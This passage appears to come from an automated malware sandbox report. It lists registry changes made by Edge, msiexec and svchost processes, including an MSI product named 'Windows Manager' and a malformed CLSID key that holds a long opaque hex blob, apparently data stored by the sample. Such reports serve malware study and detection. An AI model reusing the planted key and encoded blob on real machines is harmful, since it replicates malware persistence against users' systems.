"1" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" svchost.exe -
Modifies registry class 64 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exemsiexec.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeFileSyncConfig.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\wholehugewords.com\NumberOfS = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "180" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CTLs MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1" MicrosoftEdge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "886" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000e08abd64227e71cb6270bc3db535d7a5a01104dad6f9b5bb3fcde6100dafb083a9f5ad70c95d55c47a717179fc52740a835ad9c78b3d3682b5a002741054bb0704a58b60716ec5e664df8508d47249275f14bd80724c7d297d95 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "340265445" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34AB MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 4 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\wholehugewords.com\ = "180" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\wholehugewords.com\Total = "29" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000624ad08f9cc79d83f4fb29b5ff5a57fbc24949537059355b71969b26779b99a36b58fdb487bde8353aba526968702bd81d0bd363b8fd904e0b2f MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\wholehugewords.com\Total = "48" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 06ac1310f4bfd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\wholehugewords.com\ = "928" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 80dabe78f7bfd701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus MicrosoftEdgeCP.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}\650478DC7424C37C\1 = 010000000000000000000000000000000000000101000000000000000000000000000000606101363635353030343437373838444443433737343432323434434333333737434300008fe989833016202581553212c0d4ade0e2004d17ca900303000004040000ff00ff00b8b8000000000000404000000000000000000000000000000000000000000000000000000000000000000000000101000e11a5b40eb4bdc4ec99b94d81ec753c011a5350021d0815130c4d43020f00011b5442074552071b4e49074e640b1c734d020b014b2300072e24000000000000874ca0a60e69af9b5d69af9b5d69af9be941c26a596daf9be941c068291daf9be941c1695064af9bf09af2995b6eaf9bf09af49f487daf9bf09af59e4c79af9b54184408586caf9b5d69ae9a3d09af9be882f8935e6baf9be882f19a5d68af9be8820e645c68af9be882f3985d68af9bcc3b0a0bab69af9b9e000000000000005015450064e281073a56515c6100000000000000f0f022022b090c0e00acac0000c2c20000000000b091210000101000000000808101000000101000000202000505020200000000050502020000000000b0b10100040400000000000202606101001010000000000010100000000000000010100000000000101000000000000000000010100000c08243015c5c00001c5f42013c3c000000909101e0e1010000707101ccc00c00000000000000000000a0a10104020600b084350138380000000000000000000000000000000000000000000000000000f0c4350194940000000000000000000000c0c000787a02000000000000000000000000000000000000000000000000002e5a111d0c740000309aaa000010100000acac0000040400000000000000000000000000202000604e5c1605151561007af18b0000c0c000008c8c0000b0b000000000000000000000000000404000406e4a051515610000c8d21a0000505101000a0a00003c3d01000000000000000000000000404000c0ee5e140515156100ccc00c0000707101000e0e0000464701000000000000000000000000404000406e49010f0d17730094940000008081010002020000545501000000000000000000000000404000406e5c010111630000e0e10100009091010002020000565701000000000000000000000000404000406e5c1709030c63000402060000a0a10100080800005859010000000000000000000000004040004242000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000fb8b648f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f6434acb42c364e345b59182e5ba09450a19e5fa7b7a0d0d77b8e6554ccb42c54176f3a6e357a61c67105b44008dcfddf9e57bfd736398cffdd9e57bfd737a6ae579ca42697de579c34e6254be3f88cb42c343c27bd0574737b8a677e357a7b88cc27bd05d5f25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000000000c3b8b649c35a98f3ba2626000101000066e345b4687ae57bd8576119b8778946ac61b17e02b8f5404acb41c064e345b591ebb8b531faafe57bc93e8a1f9a0000444bb8f5404acb41c06423c045cf8b4bce010049f0464141fcfc0808fc0c101f41cccdffd9e57bc14e7e06b8778946ac62b37c6827c27bc943524627c27bc14e6ee63e89cb41c0817adb2d801d930100444bb8b56423c045b5b34bcca6647bf10688fb7d01000fb8b564e345b45240f6f6e57bd82f88ef6901000fb8778946ac61cd8cd85a01000fb8f5404acb41c064e345b5a964b9010000c3a5e57bcb3c8a13960000444bb8f5404acb41c06423c045cf8baf2a010049f0464141fcfc0808fc42cccdffd9e57bc14e7e06b8778946ac62b37c6827c27bc943524627c27bc14e6ee63e89cb41c0817adb2d807ef10000444bb8b56423c045b5b34bcca6647bf106885cdb00000fb8b564e345b451b5f6e57bd82f884fc800000fb8778946ac61cd8c38bb00000fb8f5404acb41c064e345b5a964bb030000c3a5e57b9a6d8a1b9e00000fb8f54064e57b9b6c8a159000000fb8f5464ccb41c460e57bc93e8afb7e0000444bb8b56423c045b40035f8444341fc42cccddff9e57be16e7e06b877814eac62b36350cccd90b6e57bf17e6b7a27c27bc94561ea3e89cb41c0817acb4d407b4bb8b56423c045b5b2447adb5c4e3fb8b564e345b4564469105b440066e57bd8576b13b8778946ac61b1601cb8f5404acb41c064e345b5915cba020000c3f0f3030f00000000000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b96e1cc5c748770d77b8a65476f3a6e357a61924f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bd95e4737b8a677e357a7b88cc27bd9545f25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b9483ac5c748770e74b8a65476f3a6e357a60439f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bda5d4434b8a677e357a7b88ccccda86b7bf27d5d25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b97e0cc5c748770e74b8a65476f3a6e357a60439f3454141fcfc0808fc8ecffdd9e57bc14e7e06b8778946ac61b07e6ae579cb43697de579c34e6254be3f88cb42c343c27bda5d4434b8a677e357a7b88ccccda86b7bf27d5d25b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f000000000000c3b8b649c35a98f0b92626000101000066e345b4687ae57bd8576119b8778946ac62b27e02b8f5404acb41c064e345b59182e5b95b29c5c7480d8a21a400000fb8b667e57b9c6b8a129700000fb8f64364e57b9c6b8a0c8900000fb8f64562e57b8a070a70b8f6474ecb42c96ee57bc944047eb8a65476f3a6e357a61269101f8dcfddf9e57be16f6398cffdd9e57be16f7a6ae579ca42697de579c34e6254be3f88cb42c343c27b96114737b8a677e357a7b88cc27bca4c5425b8b667e345b4687ae57bd8576b13b8778946ac62b2601cb8f6434acb42c364e345b5915cb9010000c3f0f3030f0000000000000000008c131bcb6fcc61be3784c74186c75a90c27bff0888d6500100492aa388c580b0541600bbcf0f0531a717004c4fc280be1fa8c59025231a01ebd675c59062641a01ebdf7cc590cbcd1a01ebc063c59000011d01ebc96ac59069681d01ebf251c590a6a71d01ebfb58c5901f1f1c01ebec4fc59054541c0148c3488f67e0c4101f0fb8a7524db8bb0423faa47d40cb43c2874cbc99a5c2414f57dd8b4ace000048c1fd501478c1f5581cffc2084f430101010000c7c2ca9c520100000000ffea2894a900ffea4af4ab0048cb4b37f0101f66e5ff3f410248c5cd41748179894147020000b9bb020000482b93b8c35d29eae15ca80048c373b0cd45b42814c34337eae65ba80048cd45b43a02c74d8ec3589bc34320b0c39b0048c34430eaca77a80048c35c6eb40d0000ffea1ca2ab0048cd45b46fe4fa4b1d5201b8b901000048c3ff501478c3f7581c70cb47e47b988bc34430ea8d30a80048c3ff501403f388c3f7581c70cb47e47b988ac24135ea9825a80083be7b074001324f7bf9fa0f595201b8b901000048cb47e47b98cc101f514716005a4c1600637516006c7a1600756316007e681600879116009086160048cb6fc41bfa36ea9926aa008545cf8bdf5f040048c1d5781489b40d000048c1f55804dfea72cdaa008545cf8b9b1b0400b9b40d0000ffea51eeaa0048c35390cd45cf8b9313040048c34337eae250a7004cc75390cd45cf8b8606040048c34320233c08007a45cf8b8401010048c59859561b0148cb4a36f0109b84000000000fb8f30e4864277a7f0f49776c51cb42c34acb7ad2248b28af03000fb8b34e2c277a3f4f3fae92c3400cc2581d410101010000c7c21a4d530100000000ffea982aa700ffeaba06a900baec5600008dc7e653ea74c6a70048c35390cd45cf8bf87f030048c34337ea49fba70048c35b98cd45cf8be36403000f1f15c4d818010f1e110f1f1dcade18010f1e59581f1f15c9d518010f1e51602f1f1ddcc818010f1e59783f1f15d3cf18010f1e5100cb8ed9c5180189cb125fb8b2d3cf180166efcb161cc34034ea10a2a70048c3586ab40d0000ffea3a86a90048cd45cf8b5ed90300fffa75215001e91bf0020049c24023435206007a45cf8b4bcf000048c5988985180148cb4a36f0109b84000000000fb8f30e4864277a7f0f49776c51cb42c34acb7ada2c8b189e02000fb8b34e2c277a3f4f3fae92c3400cc248723e0101010000c7c20a5e500100000000ffea68dba600ffea8a37a800bafc4600008dc7f643ea44f7a60048c35390cd45cf8be86e020048c34337ea59eaa60048c35b98cd45cf8bd35502000f1f15140818010f1e110f1f1d1a0e18010f1e59581f1f15190518010f1e51602f1f1d2c3818010f1e5978bb862a3e180189c1084fb8b22438180166efcb06ad1f080100b6c24023647506007a45cf8b54d0000048c5981814180148cb4a369969109b84000000000fb8f30e4864277a7f0f49776c51cb42c34acb7ada2c8b38bd01000fb8b34e2c277a3f4f3fae92c3400cc268533f0101010000c7c22a7f510100000000ffea8838a500ffeaaa18a700bafc4600008dc7f643ea64d4a50048c35390cd45cf8b088d010048c34337ea79c9a50048c35b98cd45cf8bf37601000f1f15849919010f1e110f1f1d8a9f19010f1e59581f1f15899419010f1e51602f1f1d9c8919010f1e5978bb869a8f190189c1084fb8b29489190166efcb06adffe80100b6c24023849506007a45cf8b54d0000048c5986865190148cb4a369969109b84000000000fb8f30e4864277a7f0f49776c51cb42c34acb7ada2c8b58dc00000fb8b34e2c277a3f4f3fae92c3400cc288b03c0101010000c7c24a004e0100000000ffeaa819a400ffeaca79a600bafc4600008dc7f643ea8435a40048c35390cd45cf8b28ac000048c34337ea9928a40048c35b98cd45cf8b139700000f1f15f4e616010f1e110f1f1dfae016010f1e59581f1f15f9eb16010f1e51602f1f1d0c1919010f1e5978bb860a1f190189c1084fb8b20419190166efcb06addfcb0200b6c24023a4b506007a45cf8baa2f010048c5b0d0fa160133fac6b8b34b29277a3f4f3e3349b8f30b4d64277a7f0f49774c71cb42c34acb7a911dab96c34034ea15a4a40083be84853d01324f7bf9fa78334f01ffea1eada60048c3f7580468c3d7781403f388cb47eceb8bc3400cc288b13d0101010000c7c24a014f0100000000ffeaa81ea300ffeaca7aa500ba6ad00000b9bb020000ffea9a2ca30048c35390cd45b4dae6c34337ea9b2da30048cd45b4d4af1f17081e110f1f5f5f1f1e59581f1f57672f1e51602f1f5f7f3f1e59783f1f57074f1e51004f1f5f1f5f1e59185f1f57276f1e512028cb6b688f1f57377f1e51b0ff1f9f0f8000000f1e19071f97179000000f1e51501f1f9f2fa000000f1e59682f1f9737b000000f1e51703f1f9f4fc000000f1e5908a9effa0300b7c34034eaee59a200e9fcea0000b6c24023766d0c00bbcf4b89c2589bc3402318080700161304010033000000000000000000008c131bcb6fcc13e81cc24b034c0101010000899449194c01899457074c01c7c239714c0101010000c7c26b553a01f4f50100e8b1a305007ebc16664c01e8eb03007e6daa4df50100899403534c01898441773a01ebed8d86497f3a01ffea4bfca2003924e5b44d0175bd4194e9b84d0133f388cb47e47b980f00000000000000fff3030f00000000000000000000000084cb6fc4abbef4854d0101c6c2bef74d010000000075687b69109b8400000000b94df50100ffea10a7a20083be9fee4d0101759855dd640000ffeae450a10033f388cb47eceb0f00000000000000000074b9010000c30f000000000000000000000000000000aa0069109b8400000000487336b4883001f287675a8900d17691363e000d8777f0318b8908d9f92ac00300cc000084cb6fc4ad57a64dba69eb755cab69eb75629579fb757eb2b901000048cb47eceb2b5ab40600ebeeed6b8506000fb97688cb47eceb8ac25b98cb47ecc1e60f00004dc845cf9a5489cb47ecc1c52d010048c1d5782c40c1fd503458c1f5580461171ecb6fcc68c379bec77ac2fa21ce2107008444b57234f32901e80000e84ea305008a5250cc606400f7b682be47453e0100747eb3be070000e882600a00c7c2615b3e010101